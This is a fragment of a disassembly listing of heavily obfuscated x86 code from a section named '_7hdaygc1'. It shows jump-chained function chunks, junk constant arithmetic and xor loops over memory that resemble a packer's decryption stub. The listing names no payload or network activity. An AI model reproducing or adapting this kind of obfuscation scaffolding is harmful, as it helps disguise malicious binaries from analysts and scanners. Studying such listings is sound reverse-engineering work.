; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E94F
loc_428E2B: ; CODE XREF: sub_42E94F:loc_425F8C�j
add eax, ebp
call sub_425F27
loc_428E32: ; CODE XREF: _7hdaygc1:0042CD7F�j
jmp sub_4291EA
; END OF FUNCTION CHUNK FOR sub_42E94F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B74A
loc_428E37: ; CODE XREF: sub_42B74A-8731�j
jmp loc_42671D
; END OF FUNCTION CHUNK FOR sub_42B74A
; =============== S U B R O U T I N E =======================================
sub_428E3C proc near ; CODE XREF: sub_426A39+10�p
; _7hdaygc1:0042A560�j
arg_0 = dword ptr 4
xchg eax, [esp+0]
pop eax
add esi, 0BFC27143h
xchg esi, [esp-4+arg_0]
jmp sub_429999
sub_428E3C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428E4E proc near ; DATA XREF: _7hdaygc1:0042EB63�o
pop ebp
push ds:dword_423B1C
retn
sub_428E4E endp
; =============== S U B R O U T I N E =======================================
sub_428E56 proc near ; CODE XREF: sub_426130-2B67�j
; sub_42512A:loc_428391�p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004246B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427FD7 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042D4C6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042D832 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042DDD6 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042FC09 SIZE 00000006 BYTES
jnz loc_42DDD6
jmp loc_42D832
sub_428E56 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_428E61: ; CODE XREF: sub_424AE1:loc_4238D7�j
xor [esi], ebx
add [esi], ecx
xor [esi], edx
mov eax, 80000003h
jmp loc_4252FA
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EB24
loc_428E71: ; CODE XREF: sub_42EB24:loc_423CED�j
mov [ebp-8], edx
mov [ebp-4], eax
xor eax, eax
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jmp loc_423406
; END OF FUNCTION CHUNK FOR sub_42EB24
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_428E85: ; CODE XREF: sub_42C16F:loc_42307D�j
or eax, 8B6B48C7h
test eax, 2000h
jmp loc_423608
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
loc_428E96: ; CODE XREF: _7hdaygc1:00429A86�j
add ecx, 0DEE19248h
mov ecx, [ecx]
call sub_42A94C
mov edx, [ebp-4]
push 523BA72h
pop eax
jmp loc_42CA19
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E0C4
loc_428EB1: ; CODE XREF: sub_42E0C4-715D�j
xor edx, 0C6F649D0h
add edx, ebp
add edx, 6E81D420h
mov [edx], eax
pop edx
jmp loc_428973
; END OF FUNCTION CHUNK FOR sub_42E0C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424744
loc_428EC7: ; CODE XREF: sub_424744-155�j
sub esi, 6AEAE5E2h
jns loc_4288A3
loc_428ED3: ; CODE XREF: _7hdaygc1:004290CA�j
and eax, 0A5CCEE3Dh
jz loc_42C1C4
mov esi, [edi]
jmp loc_42E150
; END OF FUNCTION CHUNK FOR sub_424744
; ---------------------------------------------------------------------------
loc_428EE6: ; CODE XREF: _7hdaygc1:00428627�j
and edi, 0F828901Bh
cmp edi, 0E2A2E953h
jmp loc_426D06
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B20
loc_428EF7: ; CODE XREF: sub_423B20+E�j
pop eax
rol eax, 1Fh
test eax, 20000h
jmp loc_424D19
; END OF FUNCTION CHUNK FOR sub_423B20
; ---------------------------------------------------------------------------
locret_428F06: ; CODE XREF: _7hdaygc1:0042B425�j
retn
; ---------------------------------------------------------------------------
loc_428F07: ; CODE XREF: _7hdaygc1:0042E042�j
jmp loc_42C5D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426471
loc_428F0C: ; CODE XREF: sub_426471+C�j
jmp loc_4250D1
; END OF FUNCTION CHUNK FOR sub_426471
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4287D8
loc_428F11: ; CODE XREF: _7hdaygc1:loc_42808D�j
; sub_4287D8+7�j
push 0
push ecx
push 0DA4680E6h
pop ecx
add ecx, 36C18373h
sub ecx, 0C20AE759h
jmp loc_4271CD
; END OF FUNCTION CHUNK FOR sub_4287D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CCFE
loc_428F2B: ; CODE XREF: sub_42CCFE-4B64�j
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
mov eax, ds:dword_427474[eax*4]
call sub_42CFDA
; END OF FUNCTION CHUNK FOR sub_42CCFE
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_428F3D: ; CODE XREF: sub_42DD73-314B�j
; sub_4253A0+5B16�j
jnz loc_42A599
loc_428F43: ; CODE XREF: _7hdaygc1:0042A382�j
jmp loc_4261DE
; END OF FUNCTION CHUNK FOR sub_4253A0
; ---------------------------------------------------------------------------
loc_428F48: ; CODE XREF: _7hdaygc1:00428C98�j
jmp loc_42DF30
; ---------------------------------------------------------------------------
loc_428F4D: ; CODE XREF: _7hdaygc1:00423734�j
; _7hdaygc1:loc_4281EC�j
jmp loc_4243FD
; ---------------------------------------------------------------------------
test ecx, 416C582Ch
jmp loc_42EF53
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CCC
loc_428F5D: ; CODE XREF: sub_423CCC:loc_42816F�j
mov esi, edx
pop edx
add [esi], ebx
xor [esi], edx
jmp loc_42E845
; END OF FUNCTION CHUNK FOR sub_423CCC
; =============== S U B R O U T I N E =======================================
sub_428F69 proc near ; DATA XREF: sub_4282A9:loc_424B04�o
; _7hdaygc1:00425E9F�o ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042C833 SIZE 0000000E BYTES
push edx
push ebp
jmp loc_42C833
sub_428F69 endp
; ---------------------------------------------------------------------------
mov [ebp-4], eax
push edi
push 0CD3D7089h
xchg esi, [esp]
jmp loc_424AB6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4CE
loc_428F81: ; CODE XREF: sub_42F4CE+C�j
jnz loc_428AE7
jmp loc_42F8B4
; END OF FUNCTION CHUNK FOR sub_42F4CE
; ---------------------------------------------------------------------------
mov ebp, edx
loc_428F8E: ; CODE XREF: _7hdaygc1:loc_4237E0�j
not ebx
jmp sub_42C48C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F528
loc_428F95: ; CODE XREF: sub_42F528:loc_42F47D�j
jz loc_42D4D0
jmp loc_42DDDE
; END OF FUNCTION CHUNK FOR sub_42F528
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_428FA0: ; CODE XREF: sub_42C16F+1BFD�j
jnb loc_42B6A2
xor [edx], eax
mov eax, [ebp-4]
mov eax, [eax]
shl eax, 0Fh
mov edx, [ebp-4]
call sub_42F7E6
loc_428FB8: ; CODE XREF: sub_424F62+3818�j
jmp nullsub_71
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282A9
loc_428FBD: ; CODE XREF: sub_4282A9:loc_423234�j
jnz loc_424B04
jmp loc_423AA2
; END OF FUNCTION CHUNK FOR sub_4282A9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A39
loc_428FC8: ; CODE XREF: sub_426A39:loc_426A53�j
mov eax, ecx
xchg eax, [esp-4+arg_0]
push edi
mov edi, ebp
xchg edi, [esp+0]
push 0CCC0FB4h
jmp loc_42D94B
; END OF FUNCTION CHUNK FOR sub_426A39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BA2C
loc_428FDD: ; CODE XREF: sub_42BA2C:loc_425791�j
jz loc_42FB07
jmp loc_42A18D
; END OF FUNCTION CHUNK FOR sub_42BA2C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425522
loc_428FE8: ; CODE XREF: sub_425522:loc_425851�j
xor esi, 42EF9ADh
add esi, ebp
add esi, 0E7D90405h
push offset sub_42512A
jmp nullsub_151
; END OF FUNCTION CHUNK FOR sub_425522
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42911B
loc_429000: ; CODE XREF: sub_42911B:loc_42DE34�j
pop edx
xor edx, 3F9FEDD3h
rol edx, 2
sub edx, 0E487AB97h
add edx, 8350195Eh
call sub_42ABE3
loc_42901B: ; CODE XREF: sub_424F2F+A�j
add ecx, 8420EE2Dh
or ecx, 13424782h
xor ecx, 0E47C7F82h
rol ecx, 1
add ecx, 1054682h
xchg ecx, [esp+4+var_4]
jmp loc_42C846
; END OF FUNCTION CHUNK FOR sub_42911B
; ---------------------------------------------------------------------------
loc_42903D: ; CODE XREF: _7hdaygc1:00426887�j
popf
mov ebp, ebx
jmp loc_426C06
; ---------------------------------------------------------------------------
push 2201D521h
pop edx
rol edx, 1Eh
jnb loc_42B891
loc_429054: ; CODE XREF: _7hdaygc1:0042D48A�j
jmp loc_42C39E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E254
loc_429059: ; CODE XREF: sub_42E254:loc_42357F�j
jmp nullsub_99
; END OF FUNCTION CHUNK FOR sub_42E254
; ---------------------------------------------------------------------------
mov ebx, esi
mov edx, 3EE27E81h
mov eax, [esi]
jmp loc_42D0E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424B63
loc_42906C: ; CODE XREF: sub_424B63:loc_42469C�j
mov eax, [ebp-4]
xor edx, edx
push offset loc_42846F
jmp nullsub_96
; END OF FUNCTION CHUNK FOR sub_424B63
; ---------------------------------------------------------------------------
loc_42907B: ; CODE XREF: _7hdaygc1:loc_42BDFD�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42524F
loc_42907C: ; CODE XREF: sub_42524F+7D0C�j
jmp loc_42A438
; END OF FUNCTION CHUNK FOR sub_42524F
; ---------------------------------------------------------------------------
loc_429081: ; CODE XREF: _7hdaygc1:004233F1�j
jmp locret_428E16
; ---------------------------------------------------------------------------
loc_429086: ; DATA XREF: sub_425CA9+9864�o
mov eax, [ebp-8]
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4263AB
loc_42908E: ; CODE XREF: sub_4263AB+8125�j
jmp loc_425FEC
; END OF FUNCTION CHUNK FOR sub_4263AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_429093: ; CODE XREF: sub_423172+1B26�j
jmp loc_42B75E
; END OF FUNCTION CHUNK FOR sub_423172
; =============== S U B R O U T I N E =======================================
sub_429098 proc near ; DATA XREF: sub_42E254:loc_42806D�o
; FUNCTION CHUNK AT 00424DA1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A038 SIZE 00000005 BYTES
mov eax, [ebp+8]
cmp dword ptr [eax-0Ch], 4
jnz loc_4290AE
add dword ptr [ebp-8], 4
jmp loc_42A038
; ---------------------------------------------------------------------------
loc_4290AE: ; CODE XREF: sub_429098+7�j
add dword ptr [ebp-8], 2
jmp loc_424DA1
sub_429098 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_4290B7: ; CODE XREF: sub_423648+59F�j
; sub_423648:loc_42840E�j
test byte ptr [ebp-8], 20h
jz loc_4282FD
push ebp
jmp loc_42F373
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
loc_4290C7: ; CODE XREF: _7hdaygc1:0042FCA9�j
mov [ebp+0], ebx
jns loc_428ED3
loc_4290D0: ; CODE XREF: _7hdaygc1:loc_428DA8�j
call sub_4290DB
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E0C4
loc_4290D6: ; CODE XREF: sub_42E0C4-793E�j
jmp nullsub_77
; END OF FUNCTION CHUNK FOR sub_42E0C4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4290DB proc near ; CODE XREF: _7hdaygc1:loc_4290D0�p
; sub_42E283:loc_42A270�p
; DATA XREF: ...
push ebp
mov ebp, esp
js sub_42D30E
jmp sub_42BE63
sub_4290DB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DAF7
loc_4290E9: ; CODE XREF: sub_42DAF7-67AB�j
pop esi
loc_4290EA: ; CODE XREF: _7hdaygc1:loc_426972�j
or esi, 0EE65007Eh
add esi, 11CD0B9Eh
push offset sub_425094
jmp nullsub_68
; END OF FUNCTION CHUNK FOR sub_42DAF7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_24. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_429101: ; CODE XREF: _7hdaygc1:0042C103�j
jmp loc_426A4E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D3A
loc_429106: ; CODE XREF: sub_427D3A-331F�j
jmp nullsub_20
; END OF FUNCTION CHUNK FOR sub_427D3A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F789
loc_42910B: ; CODE XREF: sub_42F789-ABD7�j
shr eax, 6
mov edx, [ebp-4]
xor [edx], eax
inc dword ptr [ebp-8]
jmp loc_424E92
; END OF FUNCTION CHUNK FOR sub_42F789
; =============== S U B R O U T I N E =======================================
sub_42911B proc near ; DATA XREF: sub_42D85F�o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042373B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00424525 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428287 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429000 SIZE 0000003D BYTES
; FUNCTION CHUNK AT 0042A2B1 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042A7EF SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042B096 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042B823 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042C846 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CC29 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042DE34 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E7BC SIZE 00000005 BYTES
push edi
mov edi, ebp
xchg edi, [esp+4+var_4]
jb loc_42CC29
jmp loc_42B823
sub_42911B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA11
loc_42912C: ; CODE XREF: sub_42AA11-65AA�j
pop eax
and eax, 0D5CC14h
add eax, 0FF7D682Eh
xchg eax, [esp+4+var_4]
loc_42913C: ; CODE XREF: _7hdaygc1:loc_424E78�j
jmp loc_42E8B3
; END OF FUNCTION CHUNK FOR sub_42AA11
; ---------------------------------------------------------------------------
mov [ebx], eax
js loc_42B6AA
jmp sub_42F789
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F05E
loc_42914E: ; CODE XREF: sub_42F05E:loc_424E38�j
mov eax, [ebp+8]
push eax
cmp dword ptr [ebp-14h], 5
setz al
call sub_42A3F7
pop ecx
jmp loc_42DA91
; END OF FUNCTION CHUNK FOR sub_42F05E
; ---------------------------------------------------------------------------
loc_429164: ; CODE XREF: _7hdaygc1:0042B8D9�j
xor edi, 3EDC6249h
jmp loc_42AC0C
; ---------------------------------------------------------------------------
mov edx, [eax]
jmp loc_4264BA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABF7
loc_429176: ; CODE XREF: sub_42ABF7:loc_423DD0�j
; sub_42ABF7+51B3�j
push edx
push 38DD398Ch
pop edx
and edx, 0B0D1302Dh
rol edx, 1Ch
jmp loc_42B47E
; END OF FUNCTION CHUNK FOR sub_42ABF7
; ---------------------------------------------------------------------------
mov edx, 0AFF5C204h
call sub_42C1AF
push edx
push eax
pop edx
xchg edx, [esp]
ror eax, 18h
jmp loc_42C016
; =============== S U B R O U T I N E =======================================
sub_4291A3 proc near ; CODE XREF: sub_429B49:loc_42893E�p
; _7hdaygc1:0042F10A�j
; FUNCTION CHUNK AT 0042359E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424159 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00425BED SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004265C3 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00427F07 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 00428745 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429511 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042B68F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D26D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E1E2 SIZE 0000000F BYTES
xchg ecx, [esp+0]
pop ecx
push ebp
mov ebp, esp
push ecx
cmp ds:dword_425150, 0
jz loc_424159
mov eax, ds:dword_425150
jmp loc_42359E
sub_4291A3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4291C2 proc near ; DATA XREF: sub_4288FE-4D69�o
mov al, 1
call edx
xor eax, eax
retn
sub_4291C2 endp
; ---------------------------------------------------------------------------
loc_4291C9: ; CODE XREF: _7hdaygc1:00425A80�j
jmp locret_42AE6D
; =============== S U B R O U T I N E =======================================
sub_4291CE proc near ; CODE XREF: _7hdaygc1:0042D093�p
var_24 = dword ptr -24h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00425472 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425A9A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00427446 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042877F SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042DB10 SIZE 00000013 BYTES
push esi
mov esi, ebp
xchg esi, [esp+0]
jmp loc_427446
sub_4291CE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F152
loc_4291D9: ; CODE XREF: sub_42F152+15�j
mov [edx], al
loc_4291DB: ; CODE XREF: sub_424F62:loc_42E7E6�j
dec dword ptr [ebp-10h]
inc dword ptr [ebp-4]
cmp dword ptr [ebp-10h], 0
jmp loc_426166
; END OF FUNCTION CHUNK FOR sub_42F152
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4291EA proc near ; CODE XREF: sub_42E94F:loc_428E32�j
; _7hdaygc1:0042E9E1�j
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 004230C2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042327A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004243C9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00424E33 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004254DA SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00425519 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00425946 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 004260F0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00426AB7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00426D92 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004272A1 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042819F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00428409 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042863C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00428998 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00428D4A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00428D8A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00429357 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004293D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004297F8 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00429DD6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A0AF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042A1F5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AAFF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042B60F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042B931 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042BD6D SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042C164 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042C2C6 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042C37C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C6E1 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042C990 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D41A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D594 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042D65B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042D6FA SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042E3B1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E965 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042F974 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F9BC SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042FC0F SIZE 00000007 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
xchg edx, [esp+4+var_4]
jmp loc_42A1F5
sub_4291EA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E85F
loc_4291F8: ; CODE XREF: sub_42E85F:loc_4271DC�j
xor eax, 0D580FF3Ch
call sub_42DC52
; END OF FUNCTION CHUNK FOR sub_42E85F
; START OF FUNCTION CHUNK FOR sub_42C7F3
loc_429203: ; CODE XREF: sub_42C7F3+647�j
jmp loc_424202
; END OF FUNCTION CHUNK FOR sub_42C7F3
; ---------------------------------------------------------------------------
loc_429208: ; CODE XREF: _7hdaygc1:0042E76C�j
and esi, 3BF59D20h
xor esi, 9837D7Fh
jns loc_42F868
; START OF FUNCTION CHUNK FOR sub_42F56C
loc_42921A: ; CODE XREF: _7hdaygc1:00425FA8�j
; sub_42F56C:loc_42F572�j
jmp loc_423CE7
; END OF FUNCTION CHUNK FOR sub_42F56C
; ---------------------------------------------------------------------------
mov eax, [ebp+0]
loc_429222: ; CODE XREF: _7hdaygc1:loc_424C53�j
; _7hdaygc1:00424D1E�j
jmp loc_42F85F
; ---------------------------------------------------------------------------
jno loc_42624A
jmp sub_42E205
; ---------------------------------------------------------------------------
xor edx, 76A1DC33h
jmp sub_423A34
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_29. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42923E: ; CODE XREF: _7hdaygc1:0042A232�j
jmp loc_426917
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_81. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C209
loc_429244: ; CODE XREF: sub_42C209+2C2E�j
jmp loc_42D12D
; END OF FUNCTION CHUNK FOR sub_42C209
; ---------------------------------------------------------------------------
push eax
jmp loc_42A461
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425752
loc_42924F: ; CODE XREF: sub_425752+8DA�j
xchg edx, [esp+8+var_8]
push edi
pushf
push 3C837832h
xchg ecx, [esp+14h+var_14]
mov edi, ecx
pop ecx
rol edi, 1
jmp loc_42C153
; END OF FUNCTION CHUNK FOR sub_425752
; ---------------------------------------------------------------------------
loc_429266: ; CODE XREF: _7hdaygc1:004266CB�j
ja loc_42E6CB
; =============== S U B R O U T I N E =======================================
sub_42926C proc near ; CODE XREF: sub_42EBC8-A620�p
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0042AFAC SIZE 00000006 BYTES
xchg ecx, [esp+0]
pop ecx
add edx, 0AF8DBDCBh
mov al, [edx]
pop edx
xchg eax, [esp-8+arg_4]
mov ebx, eax
jmp loc_42AFAC
sub_42926C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E4D7
loc_429283: ; CODE XREF: sub_42E4D7:loc_424D0F�j
pop eax
sub eax, 7761209Eh
add eax, 8EF7727h
xchg eax, [esp+0]
jmp loc_424420
; END OF FUNCTION CHUNK FOR sub_42E4D7
; ---------------------------------------------------------------------------
loc_429298: ; CODE XREF: _7hdaygc1:00425976�j
add ebx, 0D3C8ED9Ch
loc_42929E: ; CODE XREF: _7hdaygc1:loc_42596B�j
and edx, 6C82DDF6h
sub edx, 8F3DC016h
rol edx, 10h
add edx, 18A1DEF2h
call sub_42C1AF
push eax
ror eax, 11h
jmp loc_424659
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_4292C1: ; CODE XREF: sub_42AFFE:loc_42F01E�j
push 5EC9506Eh
pop edx
sub edx, 0B90BA70Bh
or edx, 33D7506h
sub edx, 3426CF7Ch
test edx, 10000h
jmp loc_42A8E6
; END OF FUNCTION CHUNK FOR sub_42AFFE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_9. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F152
loc_4292E5: ; CODE XREF: sub_42F152-93F2�j
jmp loc_42CB72
; END OF FUNCTION CHUNK FOR sub_42F152
; ---------------------------------------------------------------------------
mov eax, [ebp-20h]
cmp eax, [ebp-0Ch]
jnz loc_42DF67
jmp loc_42FAAB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_4292FB: ; CODE XREF: sub_42AFFE:loc_42A8E6�j
; sub_42AFFE-708�j ...
add edx, 1126D7C5h
add edx, ebp
add edx, 7B41FA4Ch
mov edx, [edx]
lea eax, [ebp+var_14]
mov ecx, [ebp+var_30]
jmp loc_426E91
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
loc_429316: ; CODE XREF: _7hdaygc1:0042ACE3�j
and esi, ebx
; =============== S U B R O U T I N E =======================================
sub_429318 proc near ; CODE XREF: sub_42AFFE+3BAA�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042305A SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00423704 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042399D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00423F28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424633 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004254E6 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00426577 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426C06 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 004273C7 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00428092 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00429F00 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A4A4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A8A2 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042AFBF SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042BD45 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042C07B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042C0FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E49F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042F053 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F894 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042F947 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FD46 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push eax
mov eax, [ebp-1Ch]
push eax
call sub_426CBB
mov [ebp-30h], eax
jmp loc_42399D
sub_429318 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42932E: ; CODE XREF: _7hdaygc1:0042A572�j
jg loc_429D44
jmp loc_42B938
; ---------------------------------------------------------------------------
locret_429339: ; CODE XREF: _7hdaygc1:00428203�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42933A: ; CODE XREF: sub_425E64:loc_42F18C�j
; sub_426978+937B�j
jmp loc_424F72
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_42933F: ; CODE XREF: sub_424AE1-1079�j
mov eax, [ebp-1Ch]
push offset loc_424144
loc_429347: ; CODE XREF: sub_428B11+ABE�j
jmp nullsub_105
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F1C6
loc_42934C: ; CODE XREF: sub_42F1C6:loc_428D80�j
popf
call sub_42F65A
loc_429352: ; CODE XREF: _7hdaygc1:0042CEDD�j
jmp loc_42A5D2
; END OF FUNCTION CHUNK FOR sub_42F1C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_429357: ; CODE XREF: sub_4291EA-3884�j
jmp loc_42D6FA
; END OF FUNCTION CHUNK FOR sub_4291EA
